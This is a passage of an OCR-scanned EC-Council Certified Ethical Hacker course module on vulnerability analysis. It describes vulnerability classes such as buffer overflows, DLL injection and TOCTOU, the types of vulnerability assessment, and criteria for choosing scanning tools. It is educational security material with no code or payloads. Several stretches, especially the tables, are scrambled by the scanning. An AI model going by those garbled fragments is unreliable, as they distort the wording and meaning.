must understand the anatomy of common security vulnerabilities and develop highly secure applications by providing proper user validation and authorization. The following are some of the application flaws that can be exploited by attackers. Buffer Overflows Buffer overflows are common software vulnerabilities resulting from coding errors that allow attackers to gain access to the target system. In a buffer overflow attack, the attacker undermines the functioning of programs and attempts to take control of the system by writing content beyond the allocated size of the buffer. Insufficient bounds checking in the program is the root cause of this vulnerability. The buffer cannot handle data beyond its limit, causing the flow of data to adjacent memory locations and overwriting their data values. When a buffer overflow occurs, systems often crash, become unstable, or show erratic program behavior. Memory Leaks A memory leak or resource leak is an unintended class of memory consumption that occurs when a programmer fails to erase an assigned block of memory when no longer required. It is caused by exceptional circumstances, flaw conditions, and uncertainty over which portion of code is responsible for freeing memory. These conditions depend on application consequences in cases such as such as short-lived user-land applications, long-lived user-land applications, and kernel-land processes. A memory leak results in software reliability-related concerns and encourages a malicious actor to take control over the compromised system to perform attacks such as DoS to crash the system, inject malicious code to change application behavior, and hijack the program’s control flow. Tools such as Valgrind, which is compatible with the Unix/Linux environment, track memory leaks and display the status of the software environment. Resource Exhaustion A resource exhaustion attack damages the server by sending multiple resource requests from different locations to exploit software bugs or errors, thereby hanging the system

and server or causing a system crash. In software applications, memory management

has an error of memory leaks that can be exploited easily by remote attackers. It is similar to a DoS attack in that it can compromise or exhaust the resources available for a system in the network. Owing to design or code errors, any interaction or connection established between the client and server can waste resources or consume more resources than required. Integer Overflows An integer overflow occurs when an arithmetic function generates and attempts to store an integer value larger than the maximum value that the allocated memory space can store. These overflow conditions may lead to undesirable behavior of the software. Failure to discover an overflow condition beforehand can cause security and reliability issues in the program. Alongside yielding inaccurate results and causing software instability, integer overflows can also lead to buffer overflows and open doors for Module 05 Page 546

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Vulnerability Analysis attackers to execution.

=

manipulate

Exam 312-50 Certified Ethical Hacker values,

eventually

leading

to

random

or

malicious

code

Null Pointer/Object Dereference Also known as a null reference, a null pointer is a value stored to represent that the pointer is not designated to any valid object; it also indicates invalid memory location. The majority of null-pointer issues lead to common software reliability issues, but once an attacker deliberately triggers a null-pointer dereference, they might be able to use the resulting exception to evade the security logic and make the application disclose debugging details that can help in devising strategies for subsequent attacks. Programs generally utilize these null pointers to indicate a condition such as the last point of unspecified length and incompetence to perform some operations; this type of nullpointer usage is comparable to the nullable types and no value in the option type. A null-pointer dereference can prevent a program from execution or crash the program and cause it to exit.

=

DLL Injection

When an application runs third-party code or untrusted code that loads an assembly or DLL file, an attacker may exploit this vulnerability to inject a malicious DLL into the current running process and execute malicious code. Furthermore, loading DLL files without specifying the complete path of the file location may allow attackers to create a malicious DLL and place it in a location that precedes the path of the legitimate DLL file. Consequently, the application executes the malicious DLL. To prevent such vulnerabilities, programmers must never load untrusted DLLs from user input and must always invoke DLLs by specifying the full path of the file location. =

Race Conditions A race condition is an undesirable incident that occurs when a software or system program depends on the execution of processes in a sequence and on the timing of the programs. This condition occurs when a system that handles events in a sequential format is coerced to perform multiple operations simultaneously. The condition results in the improper execution of a program or software bugs. A typical race condition occurs when multiple threads depend on a shared resource. Most race conditions impact the security associated with the system. An attacker can perform DoS or privilege escalation attacks by accessing the shared resource of a trusted process.

o

Time of Check/Time of Use The time of check or time of use (TOC/TOU) is a software error that occurs because of the race condition that occurs after checking the state of particular segment of the system at a specific time and before the time of using the checking results. In simple terms, it is defined as the change in system state from the time of checking for a prediction to the time of acting on the prediction. It is a timing vulnerability

that occurs when the system grants access permission to a resource request. For

example, when a user wishes to transfer an amount from one account to another, a

Module 05 Page 547

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Vulnerability Analysis

Exam 312-50 Certified Ethical Hacker

risk of an attack exists in the middle of the transaction between

the TOC and TOU,

i.e., from the time of checking whether the required amount is available to the time of transferring that amount. =

Improper Input Handling Input handling is defined as the verification of application functionalities such as validation, filtering, sanitizing, encryption, and decryption of input data. Failure in verifying the input data results in vulnerabilities. Input validation is mandatory to ensure the integrity of incoming data by checking and comparing the data with the type of expected data. Data originating from both trusted and untrusted sources have the risk of being corrupted by attackers using techniques such as SQL injection, cross-site scripting, and buffer overflow. Implementing both client-side and server-side validation ensures effective data authentication.

=

Improper Error Handling Improper error handling occurs when an attacker exploits the security system by utilizing error information. Most web applications or servers disclose detailed information about errors such as database dumps and stack traces. They can also generate detailed errors that include information about the system condition such as system call failure, timeouts, exceptions, and data availability, which can help an attacker analyze and attack the system. Fail-open is one of the security issues caused by improper error handling. Fail-open is defined as the granting of access after a system has failed or denied access.

Poor Patch Management A patch is a small piece of software designed to fix problems, security vulnerabilities, and bugs as well as improve the usability or performance of a computer program or its supporting data. Software vendors provide patches that prevent exploitations and reduce the probability of threats exploiting a specific vulnerability. Unpatched software can make an application, server, or device vulnerable to various attacks. The following are some examples of poor patch

management. =

Unpatched Servers

Servers are an essential component of the infrastructure of any organization. There have been several cases where organizations ran unpatched and misconfigured servers that compromised the security and integrity of the data in their system. Hackers search for these vulnerabilities in servers and exploit them. These unpatched servers serve as a hub for attackers or an entry point into the network. This can lead to the exposure of private data, financial loss, and discontinuation of operations. Updating software regularly and maintaining systems properly by patching and fixing bugs can help in mitigating the vulnerabilities caused by unpatched servers. =

Unpatched Firmware

Unpatched firmware may lead to vulnerabilities through which an attacker can easily enter a corporate network and steal critical information or damage critical resources. Module 05 Page 548

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Vulnerability Analysis

Exam 312-50 Certified Ethical Hacker

Firmware vulnerabilities allow attackers to inject malicious code, infect legitimate updates, delete data stored on the hard drive, or even control the system hardware from a remote location in some cases. To mitigate such vulnerabilities, security professionals must regularly check and update the firmware.

=

Unpatched OS Attackers use systems having unpatched OSes as the origin of an infection vector to infect other systems or devices connected to the same network. Attackers scan for systems having unpatched OSes and use those systems for spreading malware to other systems connected to the network. If an attacker identifies a vulnerability in an OS kernel file or shared library, they can exploit this vulnerability in an attempt to perform privilege escalation using malware that gains system- or root-level access. Security professionals must enable the auto-update feature to update OSes automatically and regularly.

=

Unpatched Applications Unpatched application vulnerabilities allow attackers to inject and run malicious code by exploiting a known software bug. Generally, no software or applications are flawless. Software vendors frequently release patches to resolve identified vulnerabilities. Unpatched applications pave the way for attackers to exploit and compromise the security of systems and software. Therefore, it is important for organizations to apply vulnerability patches and upgrade applications on a regular basis.

Design Flaws Vulnerabilities due to design flaws are universal to all operating devices and systems. Design vulnerabilities such as incorrect encryption or the poor validation of data refer to logical flaws in the functionality of the system that attackers exploit to bypass the detection mechanism and

acquire access to a secure system.

Third-Party Risks A third party can become another potential threat to enterprises. Third-party services or products can have access to privileged systems and applications, through which financial information, customer and employee data, and processes in the enterprise’s supply chain can be compromised. The third party may be trustworthy, but enterprises usually do not check if they maintain appropriate standards and security measures; eventually, they can become a threat for the enterprise network. Major third-party risks include identity theft, intellectual property theft, data breaches, implantation of file-less malware, and network intrusions. An organization should be aware of third-party risks and run real-time, continuous risk management processes within the environment. The following are different types of risks associated with third-party dependency. =

Vendor management: It is the activity of selecting suppliers and assessing the risks of third-party services and products. It includes all the essential programs and processes required for an organization to handle and manage operations and communications with its third-party vendors. Organizations often depend on third-party vendors to save

Module 05 Page 549

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Vulnerability Analysis

Exam 312-50 Certified Ethical Hacker

expenses, fend off market rivalry, increase productivity, and gain higher profits with lower effort. However, if the third-party vendor is not trusted or fails to follow the required standards, it can pose risks to the organization’s data or information. The organization may need to face all the consequences in case of a breach. The best approach to discover risks associated with the third party include employing best vendor management practices alongside enforcing third-party vendor risk management

systems. o

System integration: It is a process of employing third-party services or hiring thirdparty vendors to run business operations. When a third party hosts the services or performs software development for the company, the system integrators need full access to the systems/application. As the integrators work from inside the company, they can easily evade firewalls and security solutions and install malware or spyware in the network. The integrators can also employ port scanning techniques to obtain data packets directly from the network. Organizations need to oversee the operations of third-party vendors and the progress of projects.

o

Lack of vendor support: Organizations often depend on third-party vendors to manage the security of systems inside a network. In such cases, the vendors are entrusted with discovering and fixing issues before they get exploited, and they become members within the working environment of the organization. As they deal with complex network infrastructure, insufficient knowledge in handling security systems or identifying risks can open avenues for new cyber-attacks. Vendors should be adept in finding issues and should be encouraged to maintain a high quality of work and keep systems secure and updated.

=

Supply-chain risks: The majority of network devices and systems in an organization are often purchased from a third party. The use of such equipment in each segment along the supply chain can potentially pose security risks due to improper maintenance or configuration. Proper security controls must be implemented for the equipment/devices or software that organizations purchase or borrow from a third party. For instance, the software or hardware purchased from a third party may not be properly sanitized. In such cases, malware concealed inside the previously provisioned equipment can infect the new systems deployed in the organization and spread to all other devices connected to the network.

=

Outsourced code development: In some cases, enterprises do not have all the resources required for developing products inside their environment. In such cases, organizations hire contract-based third parties to develop products or software. In such cases, organizations should establish a secure environment for the third-party designers to develop and assess the code being built. Organizations should also determine where the code needs to be stored and place appropriate security controls to the storage space because the code can be stolen to develop similar projects. After the coding process is completed, the product requires thorough testing, and developers should ensure that unauthorized access to the application resources is prevented. It is also important to ensure that resources being accessed by the application are stored in a

Module 05 Page 550

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Vulnerability Analysis

Exam 312-50 Certified Ethical Hacker

protected environment and that data are encrypted before being transmitted over the network. =

Data storage: With the emergence of cloud technology, organizations are storing large amounts of data in third-party storage spaces, where vendors may also have access to organizations’ data. Therefore, the data should be frequently inspected for security

concerns to protect sensitive information related to customers, employees, or users. Organizations should insist that appropriate security controls be implemented and integrity be maintained for the data stored in the third-party storage. Data transmission should be performed with encryption and through a secure channel. =

Cloud-based vs. on-premises risks: As organizations are migrating their business infrastructure to cloud environments, storage and data exposure issues often arise in third-party storage locations. On the other hand, businesses running in an on-premises environment may also have issues such as weak security configurations, application or software vulnerabilities, and vendor issues that can emerge from network devices such as firewalls, switches, and routers, which are placed within the organization’s infrastructure. Proper configuration and encryption are the main solutions for both environments. In the context of cloud security, the cloud provider has the sole responsibility of securing the cloud; however, the client should also be aware of the best practices to use cloud services in a secure manner.

Default Installations/Default Configurations Default installations are usually user-friendly — especially when the device is being used for the first time when the primary concern is the usability of the device rather than the device’s security. In some cases, infected devices may not contain any valuable information, but are connected to networks or systems that have confidential information that would result in a data breach. Failing to change the default settings while deploying the software or hardware allows the attacker to guess the settings to break into the system. Systems or devices with default configurations, if connected to the production or corporate network, enable attackers to perform advanced persistent attacks. These systems allow attackers to gain information about the target OS and other vulnerabilities existing in the target network. Based on the identified vulnerabilities, attackers may perform further attacks. When connecting a system or device to a network, it is important to disable unnecessary components and services associated with the default configuration. Operating System Flaws Due to vulnerabilities in the operating systems, applications such as Trojans, worms, and viruses pose threats. These attacks use malicious code, script, or unwanted software, which results in the loss of sensitive information and control of computer operations. Timely patching of the OS, installing minimal software applications, and using applications with firewall capabilities are essential steps that an administrator must take to protect the OS from attacks.

Module 05 Page 551

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Vulnerability Analysis

Exam 312-50 Certified Ethical Hacker

Default Passwords Manufacturers provide users with default passwords to access the device during its initial setup, which users must change for future use. When users forget to update the passwords and continue using the default passwords, they make devices and systems vulnerable to various attacks, such as brute force and dictionary attacks. Attackers exploit this vulnerability to obtain access to the system. Passwords should be kept confidential; failing to protect the confidentiality of a password allows the system to be easily compromised. Zero-Day Vulnerabilities Zero-day vulnerabilities are unknown vulnerabilities in software/hardware that are exposed but not yet patched. These Vulnerabilities are exploited by the attackers before being acknowledged and patched by the software developers or security analysts. Zero-day vulnerabilities are one of the major cyber-threats that continuously expose the vulnerable systems until they get patched. Legacy Platform Vulnerabilities

Legacy platform vulnerabilities are caused by obsolete or familiar codes. Legacy platforms are usually not supported when patching technical assets such as smartphones, computers, loT devices, OSes, applications, databases, firewalls, intrusion detection systems (IDSs), or other network components. This type of vulnerabilities could cause costly data breaches for organizations. Legacy systems can be secured using other security controls, rather than by fixing them. Another possible solution is to segregate these systems from the network so that attackers cannot gain physical access to them. System Sprawl/Undocumented Assets

The system sprawl vulnerability arises within an organization network because of an increased number of system or server connections without proper documentation or the understanding of their maintenance. These assets are often neglected over time, making them susceptible to attacks. It could also lead to expensive maintenance because each vulnerable asset will be included in the maintenance cost each time effective maintenance is required or the latest hardware or software upgrades need to be scheduled. Additionally, undocumented assets do not support multiplexed database backups or quick multi-streaming, thereby forcing IT teams to choose between fast backups and capacity optimization. Improper Certificate and Key Management Improper certificate and key management may lead to many vulnerabilities that allow attackers to perform password cracking and data exfiltration attacks. Keys stored on servers are vulnerable to attacks. Security professionals need to ensure that keys are stored in an encrypted format and are decrypted only in a protected secure environment. Storing or retaining legacy or outdated keys also poses major threats to organizations. Private keys used with certificates must be stored in a highly secured environment; otherwise, an unauthorized individual can intercept the keys and gain access to confidential data or critical systems.

Module 05 Page 552

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Vulnerability Analysis

Exam 312-50 Certified Ethical Hacker

Types of Vulnerability Assessment Assessment Type Active Assessment Passive Assessment

Description © USS network scanner tofind hosts, services, and vulnerabilities © Used to sniff the network traffic to discover present

active systems, network services, applications, and wuinerabilities present © Assesses the network from a hacker's perspective to External Assessment discover exploits and vulnerabilities that areaccessible | to the outside world the internal infrastructure to discover exploits Internal Assessment © Scans and vulnerabilities O @aenbocniG a SSC eeaey system configurations, user directories, file systems,

Host-based

CE H

Assessment Type Perea Assessment

Description © Focuseson testing databases, such as MYSQL, MSSQL, ORACLE, POSTGRESQL, etc., for the presence of data cs

Wireless Network Assessment pees gsc vane Credentialed Assessment

© Determines the vulnerabilities in the organization's wireless networks © Assesses the distributed organization assets, such as client and server applications, simultaneously through appropriate synchronization techniques © Assesses the network by obtaining the credentials of all ‘ present in the network machines

Non-Credentialed

© Assesses the network without acquiring any credentials

ETI

EES

Assessment ofthe assets present in the enterprise network registry settings, etc.,to evaluate the possibilty of Gouauliied © inthis type of assessment, the ethical hacker manually © Determines possible network security attacksthat may | | Manual Assessment assesses the vulnerabilities, vulnerability ranking, occur on the organization's system vulnerability score, etc. © Tests and analyzestes all elements of the web © Inthis type type of assessment, the ethical hacker emploets ‘Automated infrastructure for any misconfiguration, outdated various vulnerability assessment tools, such as Nessus, Assessment content,or known vulnerabilities Qualys, GF LanGuard, etc.

Assessment Network-based ‘Assessment ‘Application

Assessment

Types of Vulnerability Assessment Given below are the different types of vulnerability assessments: Active Assessment

A type of vulnerability assessment that uses network scanners to identify the hosts, services, and vulnerabilities present in a network. Active network scanners can reduce the intrusiveness of the checks they perform. Passive Assessment

Passive assessments sniff the traffic present on the network to identify the active systems, network services, applications, and vulnerabilities. Passive assessments also provide a list of the users who are currently accessing the network. External Assessment External assessment examines the network from a hacker’s point of view to identify exploits and vulnerabilities accessible to the outside world. These types of assessments use external devices such as firewalls, routers, and servers. An external assessment estimates the threat of network security attacks from outside the organization. It determines the level of security of the external network and firewall. The following are some of the possible steps in performing an external assessment: o

Determine a set of rules for firewall and router configurations for the external network

o

Check whether the external server devices and network devices are mapped

o

Identify open ports and related services on the external network

Module 05 Page 553

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Vulnerability Analysis

=

o

Examine the patch levels on the server and external network devices

o

Review detection systems such as IDS, firewalls, and application-layer protection

systems

©

Get information on DNS zones

©

Scan the external network through a variety of proprietary tools available on the

o

Examine Web applications such as e-commerce and shopping cart software for vulnerabilities

Internet

Internal

Assessment

An internal assessment involves scrutinizing the internal network to find exploits and vulnerabilities. The following are some of the possible steps in performing an internal

assessment:

=

co

Specify the open ports and related services on network devices, servers, and

o

Check the router configurations and firewall rule sets

o

List the internal vulnerabilities of the operating system and server

©

Scan for any trojans that may be present in the internal environment

o

Check the patch levels on the organization’s internal network devices, servers, and

o

Check for the existence of malware, spyware, and virus activity and document them

o

Evaluate the physical security

o

Identify and review the remote management process and events

©.

Assess the file-sharing mechanisms (for example, NFS and SMB/CIFS shares)

o

Examine the antivirus implementation and events

systems

systems

Host-based Assessment Host-based assessments are a type of security check that involve conducting a configuration-level check to identify system configurations, user directories, file systems, registry settings, and other parameters to evaluate the possibility of compromise. These assessments check the security of a particular network or server. Host-based scanners assess systems to identify vulnerabilities such as native configuration tables, incorrect registry or file permissions, and software configuration errors. Host-based assessments use many commercial and open-source scanning tools.

=

Network-based Assessment Network assessments determine the possible network security attacks that may occur on an organization’s system. These assessments discover network resources and map the ports and services running to various areas on the network. It evaluates the

Module 05 Page 554

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Vulnerability Analysis

Exam 312-50 Certified Ethical Hacker

organization’s system for vulnerabilities such as missing patches, unnecessary services, weak authentication, and weak encryption. Network assessment professionals use firewalls and network scanners, such as Nessus. These scanners identify open ports, recognize the services running on those ports, and detect vulnerabilities associated with these services. These assessments help organizations identify points of entry and attack into a network since they follow the path and approach of the hacker. They help organizations determine how systems are vulnerable to Internet and intranet attacks, and how an attacker can gain access to important information. A typical network assessment conducts the following tests on a network:

=

o

Checks the network topologies for inappropriate firewall configuration

o

Examines the router filtering rules

o

Identifies inappropriately configured database servers

o.

Tests individual services and protocols such as HTTP, SNMP, and FTP

o

Reviews HTML source code for unnecessary information

o

Performs bounds checking on variables

Application Assessment

An application assessment focuses on transactional Web applications, server applications, and hybrid systems. It analyzes all elements infrastructure, including deployment and communication within the This type of assessment tests the webserver infrastructure for any outdated content, or known vulnerabilities. Security professionals use and open-source tools to perform such assessments. =

Database

traditional clientof an application client and server. misconfiguration, both commercial

Assessment

A database assessment is any assessment focused on testing the databases for the presence of any misconfiguration or known vulnerabilities. These assessments mainly concentrate on testing various database technologies like MYSQL, MSSQL, ORACLE, and POSTGRESQL to identify data exposure or injection type vulnerabilities. Security professionals use both commercial and open-source tools to perform such assessments. =

Wireless Network Assessment Wireless network assessment determines the vulnerabilities in an organization’s wireless networks. In the past, wireless networks used weak and defective data encryption mechanisms. Now, wireless network standards have evolved, but many networks still use weak and outdated security mechanisms and are open to attack. Wireless network assessments try to attack wireless authentication mechanisms and gain unauthorized access. This type of assessment tests wireless networks and identifies rogue networks that may exist within an organization’s perimeter. These assessments audit client-specified sites with a wireless network. They sniff wireless network traffic and try to crack encryption keys. Auditors test other network access if they gain access to the wireless network.

Module 05 Page 555

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Vulnerability Analysis =

Exam 312-50 Certified Ethical Hacker

Distributed Assessment This type of assessment, employed by organizations that possess assets like servers and clients at different locations, involves simultaneously assessing the distributed organization assets, such as client and server applications, using appropriate synchronization techniques. Synchronization plays a critical role in this type of assessment. By synchronizing the test runs together, all the separate assets situated at multiple locations can be tested at the same time.

=

Credentialed Assessment Credentialed assessment is also called authenticated assessment. In this type of assessment, the ethical hacker possesses the credentials of all machines present in the assessed network. The chances of finding vulnerabilities related to operating systems and applications are higher in credential assessment than in non-credential assessment. This type of assessment is challenging since it is highly unclear who owns particular assets in large enterprises, and even when the ethical hacker identifies the actual owners of the assets, accessing the credentials of these assets is highly tricky since the asset owners generally do not share such confidential information. Also, even if the ethical hacker successfully acquires all required credentials, maintaining the password list is a huge task since there can be issues with things like changed passwords, typing errors, and administrative privileges. Although it is the best way of assessing a target enterprise network for vulnerabilities and is highly reliable, it is a complex assessment that is challenging.

=

Non-Credentialed Assessment Non-credentialed assessment, also called unauthenticated assessment, provides a quick overview of weaknesses by analyzing the network services that are exposed by the host. Since it is a non-credential assessment, an ethical hacker does not require any credentials for the assets to perform their assessments. This type of assessment generates a brief report regarding vulnerabilities; however, it is not reliable because it does not provide deeper insight into the OS and application vulnerabilities that are not exposed by the host to the network. This assessment is also incapable of detecting the vulnerabilities that are potentially covered by firewalls. It is prone to false-positive outputs and is not reliably effective as compared to credential-based assessment.

=

Manual Assessment After performing footprinting and network scanning and obtaining crucial information, if the ethical hacker performs manual research for exploring the vulnerabilities or weaknesses, they manually rank the vulnerabilities and score them by referring to vulnerability scoring standards like CVSS and vulnerability databases like CVE and CWE. Such assessment is considered to be manual.

=

Automated Assessment An assessment where an ethical hacker uses vulnerability assessment tools such as Nessus Professional, Qualys, or GFl LanGuard to perform a vulnerability assessment of

Module 05 Page 556

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Vulnerability Analysis

Exam 312-50 Certified Ethical Hacker

the target is called an automated assessment. Unlike manual assessments, in this type of assessment, the ethical hacker does not perform footprinting and network scanning. They employ automated tools that can perform all such activities and are also capable of identifying weaknesses and CVSS scores, acquiring critical CVE/CWE information related to the vulnerability, and suggesting remediation strategies. =

Cloud-based Assessment This type of assessment focuses on evaluating overall security of the cloud infrastructure according to the cloud service provider's best practices or guidelines. This assessment involves identifying cloud infrastructure vulnerabilities and mitigating them through access control mechanisms and proper security measures complying with the standards. This type of assessment is frequently performed to identify the risks associated with the assets deployed over the cloud. It also assists security professionals to detect weak entry points on the cloud, through which the attackers can make their way into the organization’s network.

=

Mobile Application Assessment Mobile application assessment aims at protecting the privacy of data across mobile applications and APIs. It is a must-have security practice for every organization that hosts publicly accessible applications. This type of assessment involves examining source code and internal security controls of mobile applications. Security professionals need to perform this type of assessment to evaluate and improve the overall application's strength against known and future threats to protect sensitive data. An effective assessment can minimize risks and assists in incorporating appropriate security controls to increase the safety of mobile applications.

Module 05 Page 557

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Vulnerability Analysis

Exam 312-50 Certified Ethical Hacker

C'EH

LO#03: Use Vulnerability Assessment Tools

Copyright © by

Al RightsReserved

Strictly Prohibited

Vulnerability Assessment Tools Vulnerability assessment they identify all potential different approaches and appropriate assessment organization faces.

solutions are important tools for security weaknesses before an solutions available to perform a approach plays a major role

This section outlines the vulnerability assessment.

various

approaches,

information security management attacker can exploit them. There vulnerability assessment. Selecting in mitigating the threats that

solutions,

and

tools

used

to

perform

as are an an a

Comparing Approaches to Vulnerability Assessment There are four types of vulnerability assessment solutions: product-based based solutions, tree-based assessment, and inference-based assessment.

=

solutions,

service-

Product-Based Solutions Product-based solutions are installed in the organization’s internal network. They are installed either on a private or non-routable space or in the Internet-addressable portion of an organization’s network. If they are installed on a private network (behind the firewall), they cannot always detect outside attacks.

=

Service-Based Solutions Service-based solutions are offered by third parties, such as auditing or security consulting firms. Some solutions are hosted inside the network, while others are hosted outside the network. A drawback of this solution is that attackers can audit the network from the outside.

Module 05 Page 558

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Vulnerability Analysis =

Tree-Based

Exam 312-50 Certified Ethical Hacker

Assessment

In a tree-based assessment, the auditor selects different strategies for each machine or component of the information system. For example, the administrator selects a scanner for servers running Windows, databases, and web services but uses a different scanner for Linux servers. This approach relies on the administrator to provide a starting piece of intelligence, and then to start scanning continuously without incorporating any information found at the time of scanning. =

Inference-Based Assessment In an inference-based assessment, scanning starts by building an inventory of the protocols found on the machine. After finding a protocol, the scanning process starts to detect which ports are attached to services, such as an email server, web server, or database server. After finding services, it selects vulnerabilities on each machine and starts to execute only those relevant tests.

Characteristics of a Good Vulnerability Assessment Solution Organizations need to select a proper and suitable vulnerability assessment solution to detect, assess, and protect their critical IT assets from various internal and external threats. The characteristics of a good vulnerability assessment solution are as follows: =

Ensures correct outcomes by testing the network, network resources, ports, protocols,

and operating systems

=

Uses a well-organized inference-based approach for testing

=

Automatically scans and checks against continuously updated databases

=

Creates brief, actionable, customizable severity level, and trend analysis

=

Supports multiple networks

=

Suggests appropriate remedies and workarounds to correct vulnerabilities

=

Imitates the outside view of attackers to gain its objective

reports, including reports of vulnerabilities by

Working of Vulnerability Scanning Solutions Any organization needs to handle and process large volumes of data to conduct business. These large volumes of data contain privileged information of that particular organization. Attackers try to identify vulnerabilities that they can exploit, and then use these to gain access to critical data for illegal purposes. Vulnerability analysis analyzes and detects risk-prone areas in the organizational network. This analysis uses various tools and reports on the vulnerabilities present in the network. Vulnerability scanning solutions perform vulnerability penetration tests on the organizational network in three steps: =

Locating nodes: The first step in vulnerability scanning target network using various scanning techniques.

Module 05 Page 559

is to locate live hosts in the

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Vulnerability Analysis

Exam 312-50 Certified Ethical Hacker

=

Performing service and OS discovery on them: After detecting the live hosts in the target network, the next step is to enumerate the open ports and services along with the operating system on the target systems.

=

Testing those services and OS for known vulnerabilities: Finally, after identifying the open services and the operating system running on the target nodes, they are tested for known vulnerabilities. Term of References

Locate Nodes

ee

.

>

Perform

Service and

OS Discovery on them

rrres |

>

Test Services

and OS for Known

Vulnerabilities

Findings and Recommendations

Figure 5.6: The working of vulnerability scanning solutions

Types of Vulnerability Assessment Tools There are six types of vulnerability assessment tools: host-based vulnerability assessment tools, application-layer vulnerability assessment tools, depth assessment tools, scope assessment tools, active and passive tools, and location and data-examination tools. =

Host-Based Vulnerability Assessment Tools The host-based scanning tools are appropriate for servers that run various applications, such as the Web, critical files, databases, directories, and remote accesses. These hostbased scanners can detect high levels of vulnerabilities and provide required information about the fixes (patches). A host-based vulnerability assessment tool identifies the OS running on a particular host computer and tests it for known deficiencies. It also searches for common applications and services.

=

Depth Assessment Tools Depth assessment tools are used to discover and identify previously unknown vulnerabilities in a system. Generally, tools such as fuzzers, which provide arbitrary input to a system’s interface, are used to identify vulnerabilities to an unstable depth. Many of these tools use a set of vulnerability signatures to test whether a product is resistant to a known vulnerability or not.

Module 05 Page 560

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Vulnerability Analysis =

Exam 312-50 Certified Ethical Hacker

Application-Layer Vulnerability Assessment Tools Application-layer vulnerability assessment tools are designed to serve the needs of all kinds of operating system types and applications. Various resources pose a variety of security threats and are identified by the tools designed for that purpose. Observing system vulnerabilities through the Internet using an external router, firewall, or webserver is called an external vulnerability assessment. These vulnerabilities could be external DoS/DDoS threats, network data interception, or other issues. The analyst performs a vulnerability assessment and notes vulnerable resources. The network vulnerability information is updated regularly into the tools. Application-layer vulnerability assessment tools are directed towards web servers or databases.

=

Scope Assessment Tools

Scope assessment tools provide an assessment of the security by testing vulnerabilities in the applications and operating system. These tools provide standard controls and a reporting interface that allows the user to select a suitable scan. These tools generate a standard report based on the information found. Some assessment tools are designed to test a specific application or application type for vulnerability. =

Active and Passive Tools Active scanners perform vulnerability checks on the network functions that consume resources on the network. The main advantage of the active scanner is that the system administrator or IT manager has good control of the timing and the parameters of vulnerability scans. This scanner cannot be used for critical operating systems because it uses system resources that affect the processing of other tasks. Passive scanners are those that do not considerably affect system resources, as they only observe system data and perform data processing on a separate analysis machine. A passive scanner first receives system data that provide complete information on the processes that are running and then assesses that data against a set of rules.

=

Location and Data Examination Tools Listed below are some of the location and data examination tools: o

Network-Based Scanner: Network-based scanners are those that interact only with the real machine where they reside and give the report to the same machine after scanning.

o

Agent-Based Scanner: Agent-based scanners scan several machines on the same network.

©

Proxy Scanner: Proxy scanners are the network-based networks from any machine on the network.

o

Cluster scanner: Cluster scanners are similar to proxy scanners, but they can simultaneously perform two or more scans on different machines in the network.

Module 05 Page 561

reside on a single machine scanners

that

but can can

scan

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Vulnerability Analysis

Exam 312-50 Certified Ethical Hacker

Choosing a Vulnerability Assessment Tool Vendor-designed vulnerability assessment tools can be used to test a host or application for vulnerabilities. There are several available vulnerability assessment tools that include port scanners, vulnerability scanners, and OS vulnerability assessment scanners. Organizations must choose appropriate tools based on their test requirements. Choose the tools that best satisfy the following requirements: Tools must be capable of testing anywhere from dozens to 30,000 different vulnerabilities, depending on the product The selected tool should have a sound database of vulnerabilities and frequently updated attack signatures Pick a tool that matches the environment and expertise

Make sure to regularly update the scan engine to ensure the tool is aware of the latest known vulnerabilities Verify that the chosen vulnerability assessment tool has accurate network mapping, application mapping, and penetration tests. Not all tools can find the protocols running and analyze a network’s performance. Ensure that the tool has several regularly updated vulnerability scripts for the platforms you are scanning Make sure that any patches are applied; failing to do so might lead to false positives Find out how many reports are returned, what information they contain, and whether they are exportable Check whether the tool has different levels of penetration to stop lockups The maintenance costs of tools can be offset by effectively using them Ensure that the vulnerability assessment tool can run its scans quickly and accurately Ensure that the tool can perform scans using multiple protocols Verify that the tool can understand and analyze the network topology to perform the

assessment

Bandwidth limitations are a major concern when dealing with large networks. Ensure the vulnerability assessment tool has high bandwidth allocation Ensure that the vulnerability assessment tool possess excellent query throttling features Ensure that the tool can also assess fragile systems and non-traditional assets

Module 05 Page 562

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Vulnerability Analysis

Exam 312-50 Certified Ethical Hacker

Criteria for Choosing a Vulnerability Assessment Tool The criteria to follow when follows:

choosing or purchasing any vulnerability assessment tool are as

=

